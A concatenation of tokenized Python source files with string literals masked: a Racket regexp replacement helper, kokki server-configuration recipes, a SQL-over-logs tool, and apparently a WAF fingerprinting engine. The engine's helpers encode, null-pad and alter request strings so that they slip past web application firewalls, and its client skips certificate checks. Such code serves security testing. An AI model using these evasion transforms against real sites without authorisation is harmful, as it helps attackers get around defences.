str ( j ) ) for j in range ( start , end ) ] ) <EOL> class W_Regexp ( W_AnyRegexp ) : pass <EOL> class W_PRegexp ( W_AnyRegexp ) : pass <EOL> class W_ByteRegexp ( W_AnyRegexp ) : pass <EOL> class W_BytePRegexp ( W_AnyRegexp ) : pass <EOL> class ReplacementOption ( object ) : <EOL> _attrs_ = [ ] <EOL> settled = True <EOL> def replace ( self , matches ) : <EOL> raise NotImplementedError ( "<STR_LIT>" ) <EOL> class StringLiteral ( ReplacementOption ) : <EOL> _immutable_fields_ = [ '<STR_LIT:string>' ] <EOL> def __init__ ( self , string ) : <EOL> self . string = string <EOL> def replace ( self , matches ) : <EOL> return self . string <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % self . string <EOL> class PositionalArg ( ReplacementOption ) : <EOL> _immutable_fields_ = [ '<STR_LIT>' ] <EOL> def __init__ ( self , position ) : <EOL> self . position = position <EOL> def replace ( self , matches ) : <EOL> return matches [ self . position ] <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % self . position <EOL> def parse_number ( source ) : <EOL> acc = <NUM_LIT:0> <EOL> while not source . at_end ( ) : <EOL> oldpos = source . pos <EOL> ch = source . get ( ) <EOL> if not rsre_char . is_digit ( ord ( ch [ <NUM_LIT:0> ] ) ) : <EOL> source . pos = oldpos <EOL> return acc <EOL> acc = <NUM_LIT:10> * acc + int ( ch ) <EOL> return acc <EOL> def parse_escape_sequence ( source , buffer ) : <EOL> if source . match ( u"<STR_LIT:\\>" ) : <EOL> buffer . append ( u"<STR_LIT:\\>" ) <EOL> return None <EOL> elif source . match ( u"<STR_LIT:&>" ) : <EOL> buffer . append ( u"<STR_LIT:&>" ) <EOL> return None <EOL> elif source . match ( u"<STR_LIT:$>" ) : <EOL> return PositionalArg ( <NUM_LIT:0> ) <EOL> n = parse_number ( source ) <EOL> return PositionalArg ( n ) <EOL> def parse_insert_string ( str ) : <EOL> source = regexp . Source ( str ) <EOL> buffer = rstring . UnicodeBuilder ( ) <EOL> result = [ ] <EOL> while not source . at_end ( ) : <EOL> if source . 
match ( u"<STR_LIT:\\>" ) : <EOL> escaped = parse_escape_sequence ( source , buffer ) <EOL> if escaped is not None : <EOL> if buffer . getlength ( ) : <EOL> result . append ( StringLiteral ( buffer . build ( ) ) ) <EOL> buffer = rstring . UnicodeBuilder ( ) <EOL> result . append ( escaped ) <EOL> else : <EOL> ch = source . get ( ) <EOL> buffer . append ( ch ) <EOL> if buffer . getlength ( ) : <EOL> result . append ( StringLiteral ( buffer . build ( ) ) ) <EOL> return result <EOL> def do_input_substitution ( formatter , input_string , matched_positions ) : <EOL> matched_strings = [ None ] * len ( matched_positions ) <EOL> for i , ( start , end ) in enumerate ( matched_positions ) : <EOL> assert start >= <NUM_LIT:0> and end >= <NUM_LIT:0> <EOL> matched_strings [ i ] = input_string [ start : end ] <EOL> return u"<STR_LIT>" . join ( [ fmt . replace ( matched_strings ) for fmt in formatter ] ) </s>
<s> import os <EOL> from kokki import Package , File , Service , Script <EOL> Package ( "<STR_LIT>" ) <EOL> File ( "<STR_LIT>" , <EOL> action = "<STR_LIT>" ) <EOL> command = os . path . join ( env . config . busket . path , "<STR_LIT>" , "<STR_LIT>" ) <EOL> Service ( "<STR_LIT>" , <EOL> start_command = "<STR_LIT>" % command , <EOL> stop_command = "<STR_LIT>" % command , <EOL> restart_command = "<STR_LIT>" . format ( command ) , <EOL> status_command = "<STR_LIT>" % command , <EOL> action = "<STR_LIT>" ) <EOL> Script ( "<STR_LIT>" , <EOL> not_if = lambda : os . path . exists ( env . config . busket . path ) , <EOL> cwd = "<STR_LIT>" , <EOL> code = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) . format ( install_path = env . config . busket . path ) , <EOL> notifies = [ ( "<STR_LIT:start>" , env . resources [ "<STR_LIT>" ] [ "<STR_LIT>" ] ) ] , <EOL> ) <EOL> if "<STR_LIT>" in env . included_recipes : <EOL> File ( "<STR_LIT>" , <EOL> owner = "<STR_LIT:root>" , <EOL> group = "<STR_LIT:root>" , <EOL> mode = <NUM_LIT:0> <NUM_LIT> , <EOL> content = ( <EOL> '<STR_LIT>' <EOL> ) , <EOL> notifies = [ ( "<STR_LIT>" , env . resources [ "<STR_LIT>" ] [ "<STR_LIT>" ] ) ] ) </s>
<s> from kokki import Package , Execute , Mount <EOL> if env . config . mdadm . arrays : <EOL> Package ( "<STR_LIT>" ) <EOL> Execute ( "<STR_LIT>" , <EOL> action = "<STR_LIT>" , <EOL> command = ( "<STR_LIT:(>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT:)>" <EOL> ) ) <EOL> for arr in env . config . mdadm . arrays : <EOL> array = arr . copy ( ) <EOL> fstype = array . pop ( '<STR_LIT>' , None ) <EOL> fsoptions = array . pop ( '<STR_LIT>' , None ) <EOL> mount_point = array . pop ( '<STR_LIT>' , None ) <EOL> env . cookbooks . mdadm . Array ( ** array ) <EOL> if fstype : <EOL> if fstype == "<STR_LIT>" : <EOL> Package ( "<STR_LIT>" ) <EOL> Execute ( "<STR_LIT>" % dict ( fstype = fstype , device = array [ '<STR_LIT:name>' ] ) , <EOL> not_if = """<STR_LIT>""" % dict ( device = array [ '<STR_LIT:name>' ] ) ) <EOL> if mount_point : <EOL> Mount ( mount_point , <EOL> device = array [ '<STR_LIT:name>' ] , <EOL> fstype = fstype , <EOL> options = fsoptions if fsoptions is not None else [ "<STR_LIT>" ] , <EOL> action = [ "<STR_LIT>" , "<STR_LIT>" ] ) </s>
<s> __description__ = "<STR_LIT>" <EOL> __config__ = { <EOL> "<STR_LIT>" : dict ( <EOL> description = "<STR_LIT>" , <EOL> default = { <EOL> } , <EOL> ) , <EOL> "<STR_LIT>" : dict ( <EOL> description = "<STR_LIT>" , <EOL> default = { } , <EOL> ) , <EOL> "<STR_LIT>" : dict ( <EOL> description = "<STR_LIT>" , <EOL> default = { <EOL> "<STR_LIT>" : dict ( <EOL> alias = "<STR_LIT>" , <EOL> members = [ ] , <EOL> ) , <EOL> } , <EOL> ) , <EOL> "<STR_LIT>" : dict ( <EOL> description = "<STR_LIT>" , <EOL> default = { <EOL> "<STR_LIT:all>" : dict ( <EOL> alias = "<STR_LIT>" , <EOL> members = [ "<STR_LIT:*>" ] , <EOL> ) , <EOL> "<STR_LIT>" : dict ( <EOL> alias = "<STR_LIT>" , <EOL> members = [ ] , <EOL> ) , <EOL> "<STR_LIT>" : dict ( <EOL> alias = "<STR_LIT>" , <EOL> members = [ ] , <EOL> ) , <EOL> "<STR_LIT>" : dict ( <EOL> alias = "<STR_LIT>" , <EOL> members = [ ] , <EOL> ) , <EOL> } , <EOL> ) , <EOL> "<STR_LIT>" : dict ( <EOL> description = <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> default = None , <EOL> ) , <EOL> "<STR_LIT>" : dict ( <EOL> description = "<STR_LIT>" , <EOL> default = "<STR_LIT>" , <EOL> ) , <EOL> "<STR_LIT>" : dict ( <EOL> description = <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> default = None , <EOL> ) , <EOL> "<STR_LIT>" : dict ( <EOL> description = <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> default = None , <EOL> ) , <EOL> "<STR_LIT>" : dict ( <EOL> description = <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> default = None , <EOL> ) , <EOL> "<STR_LIT>" : dict ( <EOL> description = <EOL> "<STR_LIT>" <EOL> 
"<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> default = None , <EOL> ) , <EOL> "<STR_LIT>" : dict ( <EOL> description = "<STR_LIT>" , <EOL> default = None , <EOL> ) , <EOL> "<STR_LIT>" : dict ( <EOL> description = <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> default = None , <EOL> ) , <EOL> "<STR_LIT>" : dict ( <EOL> description = "<STR_LIT>" , <EOL> default = None , <EOL> ) , <EOL> } </s>
<s> from kokki import File , Template <EOL> def SSHConfig ( name , hosts , mode = <NUM_LIT:0> <NUM_LIT> , ** kwargs ) : <EOL> File ( name , <EOL> mode = mode , <EOL> content = Template ( "<STR_LIT>" , { '<STR_LIT>' : hosts } ) , <EOL> ** kwargs ) </s>
<s> from kokki . providers . package import PackageProvider <EOL> import yum <EOL> class DummyCallback ( object ) : <EOL> def event ( self , state , data = None ) : <EOL> pass <EOL> class YumProvider ( PackageProvider ) : <EOL> def get_current_status ( self ) : <EOL> self . candidate_version = None <EOL> self . current_version = None <EOL> yb = yum . YumBase ( ) <EOL> yb . doConfigSetup ( ) <EOL> yb . doTsSetup ( ) <EOL> yb . doRpmDBSetup ( ) <EOL> for pkg in yb . rpmdb . returnPackages ( ) : <EOL> if pkg . name == self . resource . package_name : <EOL> self . current_version = pkg . version <EOL> self . log . debug ( "<STR_LIT>" % ( self . resource . package_name , self . current_version ) ) <EOL> searchlist = [ '<STR_LIT:name>' , '<STR_LIT:version>' ] <EOL> args = [ self . resource . package_name ] <EOL> matching = yb . searchPackages ( searchlist , args ) <EOL> for po in matching : <EOL> if po . name == self . resource . package_name : <EOL> self . candidate_version = po . version <EOL> self . log . debug ( "<STR_LIT>" % ( self . resource . package_name , self . current_version ) ) <EOL> def install_package ( self , name , version ) : <EOL> yb = yum . YumBase ( ) <EOL> yb . doGenericSetup ( ) <EOL> yb . doRepoSetup ( ) <EOL> yb . doLock ( ) <EOL> yb . install ( pattern = name ) <EOL> yb . buildTransaction ( ) <EOL> yb . processTransaction ( callback = DummyCallback ( ) ) <EOL> yb . closeRpmDB ( ) <EOL> yb . doUnlock ( ) <EOL> def upgrade_package ( self , name , version ) : <EOL> return self . install_package ( name , version ) </s>
<s> """<STR_LIT>""" <EOL> try : <EOL> all <EOL> except NameError : <EOL> def all ( values ) : <EOL> for val in values : <EOL> if not val : <EOL> return False <EOL> return True </s>
<s> from __future__ import with_statement <EOL> import sys <EOL> from optparse import OptionParser <EOL> from squawk . query import Query <EOL> from squawk . output import output_formats <EOL> from squawk . parsers import parsers <EOL> from squawk . sql import sql_parser <EOL> def get_table_names ( tokens ) : <EOL> if not isinstance ( tokens . tables [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , basestring ) : <EOL> return get_table_names ( tokens . tables [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] ) <EOL> return [ tokens . tables [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] ] <EOL> class Combiner ( object ) : <EOL> def __init__ ( self , files , parser_class ) : <EOL> self . files = files <EOL> self . parser_class = parser_class <EOL> self . index = <NUM_LIT:0> <EOL> self . next_file ( ) <EOL> def next_file ( self ) : <EOL> if self . index >= len ( self . files ) : <EOL> raise StopIteration ( ) <EOL> fname = self . files [ self . index ] <EOL> self . parser = self . parser_class ( sys . stdin if fname == '<STR_LIT:->' else open ( fname , "<STR_LIT:r>" ) ) <EOL> self . parser_iter = iter ( self . parser ) <EOL> self . columns = self . parser . columns <EOL> self . index += <NUM_LIT:1> <EOL> def __iter__ ( self ) : <EOL> return self <EOL> def next ( self ) : <EOL> while True : <EOL> try : <EOL> row = self . parser_iter . next ( ) <EOL> except StopIteration : <EOL> self . next_file ( ) <EOL> else : <EOL> return row <EOL> def build_opt_parser ( ) : <EOL> parser = OptionParser ( ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , default = "<STR_LIT>" , <EOL> help = "<STR_LIT>" , metavar = "<STR_LIT>" ) <EOL> return parser <EOL> def main ( ) : <EOL> parser = build_opt_parser ( ) <EOL> ( options , args ) = parser . parse_args ( ) <EOL> sql = '<STR_LIT:U+0020>' . join ( args ) . 
strip ( ) <EOL> if not sql : <EOL> print "<STR_LIT>" <EOL> return <EOL> files = get_table_names ( sql_parser . parseString ( sql ) ) <EOL> parser_name = options . parser <EOL> if parser_name : <EOL> parser = parsers [ parser_name ] <EOL> else : <EOL> fn = files [ <NUM_LIT:0> ] <EOL> if fn . rsplit ( '<STR_LIT:/>' , <NUM_LIT:1> ) [ - <NUM_LIT:1> ] == '<STR_LIT>' : <EOL> parser = parsers [ '<STR_LIT>' ] <EOL> elif fn . endswith ( '<STR_LIT>' ) : <EOL> parser = parsers [ '<STR_LIT>' ] <EOL> else : <EOL> sys . stderr . write ( "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> source = Combiner ( files , parser ) <EOL> query = Query ( sql ) <EOL> output = output_formats [ options . format ] <EOL> output ( query ( source ) ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> import re <EOL> import sys <EOL> import socket <EOL> try : <EOL> from urlparse import urlparse , urlunparse <EOL> except ImportError : <EOL> from urllib . parse import urlparse , urlunparse <EOL> import logging <EOL> try : <EOL> from bs4 import BeautifulSoup <EOL> except ImportError : <EOL> sys . stderr . write ( '<STR_LIT>' ) <EOL> sys . stderr . write ( '<STR_LIT>' ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> from . proxy import NullProxy , HttpProxy , Socks5Proxy , httplib , socks <EOL> __license__ = """<STR_LIT>""" <EOL> try : <EOL> from urllib import quote , unquote <EOL> except ImportError : <EOL> from urllib . parse import quote , unquote <EOL> unicodemapping = { '<STR_LIT:U+0020>' : '<STR_LIT>' , <EOL> '<STR_LIT:/>' : '<STR_LIT>' , <EOL> '<STR_LIT:\\>' : '<STR_LIT>' , <EOL> "<STR_LIT:'>" : '<STR_LIT>' , <EOL> '<STR_LIT:">' : '<STR_LIT>' , <EOL> '<STR_LIT:>>' : '<STR_LIT>' , <EOL> '<STR_LIT:<>' : '<STR_LIT>' , <EOL> '<STR_LIT:#>' : '<STR_LIT>' , <EOL> '<STR_LIT:!>' : '<STR_LIT>' , <EOL> '<STR_LIT:$>' : '<STR_LIT>' , <EOL> '<STR_LIT:*>' : '<STR_LIT>' , <EOL> '<STR_LIT:@>' : '<STR_LIT>' , <EOL> '<STR_LIT:.>' : '<STR_LIT>' , <EOL> '<STR_LIT:_>' : '<STR_LIT>' , <EOL> '<STR_LIT:(>' : '<STR_LIT>' , <EOL> '<STR_LIT:)>' : '<STR_LIT>' , <EOL> '<STR_LIT:U+002C>' : '<STR_LIT>' , <EOL> '<STR_LIT:%>' : '<STR_LIT>' , <EOL> '<STR_LIT:->' : '<STR_LIT>' , <EOL> '<STR_LIT:;>' : '<STR_LIT>' , <EOL> '<STR_LIT::>' : '<STR_LIT>' , <EOL> '<STR_LIT:|>' : '<STR_LIT>' , <EOL> '<STR_LIT:&>' : '<STR_LIT>' , <EOL> '<STR_LIT:+>' : '<STR_LIT>' , <EOL> '<STR_LIT:=>' : '<STR_LIT>' , <EOL> '<STR_LIT:a>' : '<STR_LIT>' , <EOL> '<STR_LIT:A>' : '<STR_LIT>' , <EOL> '<STR_LIT:b>' : '<STR_LIT>' , <EOL> '<STR_LIT:B>' : '<STR_LIT>' , <EOL> '<STR_LIT:c>' : '<STR_LIT>' , <EOL> '<STR_LIT:C>' : '<STR_LIT>' , <EOL> '<STR_LIT:d>' : '<STR_LIT>' , <EOL> '<STR_LIT:D>' : '<STR_LIT>' , <EOL> '<STR_LIT:e>' : '<STR_LIT>' , <EOL> '<STR_LIT:E>' : '<STR_LIT>' , <EOL> '<STR_LIT:f>' : '<STR_LIT>' , <EOL> '<STR_LIT:F>' 
: '<STR_LIT>' , <EOL> '<STR_LIT:g>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:h>' : '<STR_LIT>' , <EOL> '<STR_LIT:H>' : '<STR_LIT>' , <EOL> '<STR_LIT:i>' : '<STR_LIT>' , <EOL> '<STR_LIT:I>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:k>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:l>' : '<STR_LIT>' , <EOL> '<STR_LIT:L>' : '<STR_LIT>' , <EOL> '<STR_LIT:m>' : '<STR_LIT>' , <EOL> '<STR_LIT:M>' : '<STR_LIT>' , <EOL> '<STR_LIT:n>' : '<STR_LIT>' , <EOL> '<STR_LIT:N>' : '<STR_LIT>' , <EOL> '<STR_LIT:o>' : '<STR_LIT>' , <EOL> '<STR_LIT:O>' : '<STR_LIT>' , <EOL> '<STR_LIT:p>' : '<STR_LIT>' , <EOL> '<STR_LIT:P>' : '<STR_LIT>' , <EOL> '<STR_LIT:q>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:r>' : '<STR_LIT>' , <EOL> '<STR_LIT:R>' : '<STR_LIT>' , <EOL> '<STR_LIT:s>' : '<STR_LIT>' , <EOL> '<STR_LIT:S>' : '<STR_LIT>' , <EOL> '<STR_LIT:t>' : '<STR_LIT>' , <EOL> '<STR_LIT:T>' : '<STR_LIT>' , <EOL> '<STR_LIT:u>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:v>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:w>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:x>' : '<STR_LIT>' , <EOL> '<STR_LIT:X>' : '<STR_LIT>' , <EOL> '<STR_LIT:y>' : '<STR_LIT>' , <EOL> '<STR_LIT:Y>' : '<STR_LIT>' , <EOL> '<STR_LIT:z>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:0>' : '<STR_LIT>' , <EOL> '<STR_LIT:1>' : '<STR_LIT>' , <EOL> '<STR_LIT:2>' : '<STR_LIT>' , <EOL> '<STR_LIT:3>' : '<STR_LIT>' , <EOL> '<STR_LIT:4>' : '<STR_LIT>' , <EOL> '<STR_LIT:5>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> homoglyphicmapping = { "<STR_LIT:'>" : '<STR_LIT>' } <EOL> def oururlparse ( target ) : <EOL> log = logging . 
getLogger ( '<STR_LIT>' ) <EOL> ssl = False <EOL> o = urlparse ( target ) <EOL> if o [ <NUM_LIT:0> ] not in [ '<STR_LIT:http>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> log . error ( '<STR_LIT>' % o [ <NUM_LIT:0> ] ) <EOL> return <EOL> if o [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> ssl = True <EOL> if len ( o [ <NUM_LIT:2> ] ) > <NUM_LIT:0> : <EOL> path = o [ <NUM_LIT:2> ] <EOL> else : <EOL> path = '<STR_LIT:/>' <EOL> tmp = o [ <NUM_LIT:1> ] . split ( '<STR_LIT::>' ) <EOL> if len ( tmp ) > <NUM_LIT:1> : <EOL> port = tmp [ <NUM_LIT:1> ] <EOL> else : <EOL> port = None <EOL> hostname = tmp [ <NUM_LIT:0> ] <EOL> query = o [ <NUM_LIT:4> ] <EOL> return ( hostname , port , path , query , ssl ) <EOL> def modifyurl ( path , modfunc , log ) : <EOL> path = path <EOL> log . debug ( '<STR_LIT>' % path ) <EOL> for m in re . findall ( '<STR_LIT>' , path ) : <EOL> ourstr = m [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> newstr = modfunc ( ourstr ) <EOL> log . debug ( '<STR_LIT>' % ourstr ) <EOL> log . debug ( '<STR_LIT>' % newstr ) <EOL> path = path . replace ( m , newstr ) <EOL> log . debug ( '<STR_LIT>' % path ) <EOL> return path <EOL> def modifypath ( path , newstrs , log , encode = True ) : <EOL> log . debug ( '<STR_LIT>' % path ) <EOL> for m in re . findall ( '<STR_LIT>' , path ) : <EOL> ourstr = m [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> for newstr in newstrs : <EOL> if encode : <EOL> newstr = quote ( newstr ) <EOL> log . debug ( '<STR_LIT>' % ourstr ) <EOL> log . debug ( '<STR_LIT>' % newstr ) <EOL> newpath = path . replace ( m , newstr ) . replace ( '<STR_LIT:]>' , '<STR_LIT>' ) . replace ( '<STR_LIT:[>' , '<STR_LIT>' ) <EOL> yield ( newpath ) <EOL> def bruteforceascii ( ourstr ) : <EOL> listourstr = list ( ourstr ) <EOL> for pos in range ( len ( ourstr ) ) : <EOL> for i in range ( <NUM_LIT> ) : <EOL> newlistourstr = listourstr [ : ] <EOL> newlistourstr [ pos ] = chr ( i ) <EOL> yield ( quote ( '<STR_LIT>' . 
join ( newlistourstr ) ) ) <EOL> def unicodeurlencode ( ourstr ) : <EOL> newstr = str ( ) <EOL> for character in ourstr : <EOL> if unicodemapping . has_key ( character ) : <EOL> newstr += unicodemapping [ character ] <EOL> else : <EOL> newstr += character <EOL> return newstr <EOL> def nullify ( ourstr ) : <EOL> newstr = str ( ) <EOL> for character in ourstr : <EOL> newstr += character + "<STR_LIT:\x00>" <EOL> return quote ( newstr ) <EOL> def replacechars ( ourstr , origchar , newchar ) : <EOL> newstr = ourstr . replace ( origchar , newchar ) <EOL> return newstr <EOL> def nullifyspaces ( ourstr ) : <EOL> return quote ( replacechars ( ourstr , '<STR_LIT:U+0020>' , '<STR_LIT:\x00>' ) ) <EOL> def slashspaces ( ourstr ) : <EOL> return replacechars ( ourstr , '<STR_LIT:U+0020>' , '<STR_LIT:/>' ) <EOL> def tabifyspaces ( ourstr ) : <EOL> return replacechars ( ourstr , '<STR_LIT:U+0020>' , '<STR_LIT:\t>' ) <EOL> def crlfspaces ( ourstr ) : <EOL> return replacechars ( ourstr , '<STR_LIT:U+0020>' , '<STR_LIT:\n>' ) <EOL> def backslashquotes ( ourstr ) : <EOL> return replacechars ( ourstr , "<STR_LIT:'>" , "<STR_LIT>" ) <EOL> class waftoolsengine : <EOL> def __init__ ( self , target = '<STR_LIT>' , port = <NUM_LIT> , ssl = False , <EOL> debuglevel = <NUM_LIT:0> , path = '<STR_LIT:/>' , followredirect = True , extraheaders = { } , <EOL> proxy = False ) : <EOL> """<STR_LIT>""" <EOL> self . target = target <EOL> if port is None : <EOL> if ssl : <EOL> port = <NUM_LIT> <EOL> else : <EOL> port = <NUM_LIT> <EOL> self . port = int ( port ) <EOL> self . ssl = ssl <EOL> self . debuglevel = debuglevel <EOL> self . cachedresponses = dict ( ) <EOL> self . requestnumber = <NUM_LIT:0> <EOL> self . path = path <EOL> self . redirectno = <NUM_LIT:0> <EOL> self . followredirect = followredirect <EOL> self . crawlpaths = list ( ) <EOL> self . extraheaders = extraheaders <EOL> try : <EOL> self . proxy = self . 
_parse_proxy ( proxy ) if proxy else NullProxy ( ) <EOL> except Exception as e : <EOL> self . log . critical ( "<STR_LIT>" % e ) <EOL> self . proxy = NullProxy ( ) <EOL> def request ( self , method = '<STR_LIT:GET>' , path = None , usecache = True , <EOL> cacheresponse = True , headers = None , <EOL> comingfromredir = False ) : <EOL> followredirect = self . followredirect <EOL> if comingfromredir : <EOL> self . redirectno += <NUM_LIT:1> <EOL> if self . redirectno >= <NUM_LIT:5> : <EOL> self . log . error ( '<STR_LIT>' ) <EOL> followredirect = False <EOL> else : <EOL> self . redirectno = <NUM_LIT:0> <EOL> if path is None : <EOL> path = self . path <EOL> for hdr in self . extraheaders . keys ( ) : <EOL> if headers is None : <EOL> headers = { } <EOL> headers [ hdr ] = self . extraheaders [ hdr ] <EOL> if headers is not None : <EOL> knownheaders = map ( lambda x : x . lower ( ) , headers . keys ( ) ) <EOL> else : <EOL> knownheaders = { } <EOL> headers = { } <EOL> if not '<STR_LIT>' in knownheaders : <EOL> headers [ <EOL> '<STR_LIT>' ] = '<STR_LIT>' <EOL> if not '<STR_LIT>' in knownheaders : <EOL> headers [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> if not '<STR_LIT>' in knownheaders : <EOL> headers [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> k = str ( [ method , path , headers ] ) <EOL> if usecache : <EOL> if k in self . cachedresponses . keys ( ) : <EOL> self . log . debug ( '<STR_LIT>' % ( method , path ) ) <EOL> return self . cachedresponses [ k ] <EOL> else : <EOL> self . log . debug ( '<STR_LIT>' % ( k , self . cachedresponses . keys ( ) ) ) <EOL> r = self . _request ( method , path , headers ) <EOL> if cacheresponse : <EOL> self . cachedresponses [ k ] = r <EOL> if r : <EOL> response , responsebody = r <EOL> if response . status in [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] : <EOL> if followredirect : <EOL> if response . getheader ( '<STR_LIT:location>' ) : <EOL> newloc = response . getheader ( '<STR_LIT:location>' ) <EOL> self . log . 
info ( '<STR_LIT>' % newloc ) <EOL> pret = oururlparse ( newloc ) <EOL> if pret is not None : <EOL> ( target , port , path , query , ssl ) = pret <EOL> if not port : port = <NUM_LIT> <EOL> if target == '<STR_LIT>' : <EOL> target = self . target <EOL> if port is None : <EOL> port = self . port <EOL> if not path . startswith ( '<STR_LIT:/>' ) : <EOL> path = '<STR_LIT:/>' + path <EOL> if ( target , port , ssl ) == ( self . target , self . port , ssl ) : <EOL> r = self . request ( method , path , usecache , cacheresponse , <EOL> headers , comingfromredir = True ) <EOL> else : <EOL> self . log . warn ( '<STR_LIT>' % newloc ) <EOL> else : <EOL> self . log . warn ( '<STR_LIT>' % response . getheader ( '<STR_LIT:location>' ) ) <EOL> return r <EOL> def _request ( self , method , path , headers ) : <EOL> original_socket = socket . socket <EOL> try : <EOL> conn_factory , connect_host , connect_port , query_path = self . proxy . prepare ( self . target , self . port , path , self . ssl ) <EOL> params = dict ( ) <EOL> if sys . hexversion > <NUM_LIT> : <EOL> params [ '<STR_LIT>' ] = <NUM_LIT:4> <EOL> if ( sys . hexversion >= <NUM_LIT> ) and self . ssl : <EOL> import ssl as ssllib <EOL> params [ '<STR_LIT>' ] = ssllib . _create_unverified_context ( ) <EOL> h = conn_factory ( connect_host , connect_port , ** params ) <EOL> if self . debuglevel <= <NUM_LIT:10> : <EOL> if self . debuglevel > <NUM_LIT:1> : <EOL> h . set_debuglevel ( self . debuglevel ) <EOL> try : <EOL> self . log . info ( '<STR_LIT>' % ( method , path ) ) <EOL> h . request ( method , query_path , headers = headers ) <EOL> except socket . error : <EOL> self . log . warn ( '<STR_LIT>' % self . target ) <EOL> return <EOL> self . requestnumber += <NUM_LIT:1> <EOL> response = h . getresponse ( ) <EOL> responsebody = response . read ( ) <EOL> h . close ( ) <EOL> r = response , responsebody <EOL> except ( socket . error , socket . timeout , httplib . BadStatusLine ) : <EOL> self . log . 
warn ( '<STR_LIT>' ) <EOL> r = None <EOL> finally : <EOL> self . proxy . terminate ( ) <EOL> return r <EOL> def querycrawler ( self , path = None , curdepth = <NUM_LIT:0> , maxdepth = <NUM_LIT:1> ) : <EOL> self . log . debug ( '<STR_LIT>' % path ) <EOL> localcrawlpaths = list ( ) <EOL> if curdepth > maxdepth : <EOL> self . log . info ( '<STR_LIT>' % maxdepth ) <EOL> return <EOL> r = self . request ( path = path ) <EOL> if r is None : <EOL> return <EOL> response , responsebody = r <EOL> try : <EOL> soup = BeautifulSoup ( responsebody ) <EOL> except : <EOL> self . log . warn ( '<STR_LIT>' ) <EOL> return <EOL> tags = soup ( '<STR_LIT:a>' ) <EOL> for tag in tags : <EOL> try : <EOL> href = tag [ "<STR_LIT>" ] <EOL> if href is not None : <EOL> tmpu = urlparse ( href ) <EOL> if ( tmpu [ <NUM_LIT:1> ] != '<STR_LIT>' ) and ( self . target != tmpu [ <NUM_LIT:1> ] ) : <EOL> self . log . debug ( '<STR_LIT>' % href ) <EOL> continue <EOL> if tmpu [ <NUM_LIT:0> ] not in [ '<STR_LIT:http>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> self . log . debug ( '<STR_LIT>' % href ) <EOL> continue <EOL> path = tmpu [ <NUM_LIT:2> ] <EOL> if not path . startswith ( '<STR_LIT:/>' ) : <EOL> path = '<STR_LIT:/>' + path <EOL> if len ( tmpu [ <NUM_LIT:4> ] ) > <NUM_LIT:0> : <EOL> location = urlunparse ( ( '<STR_LIT>' , '<STR_LIT>' , path , tmpu [ <NUM_LIT:3> ] , tmpu [ <NUM_LIT:4> ] , '<STR_LIT>' ) ) <EOL> self . log . info ( '<STR_LIT>' % location ) <EOL> return href <EOL> 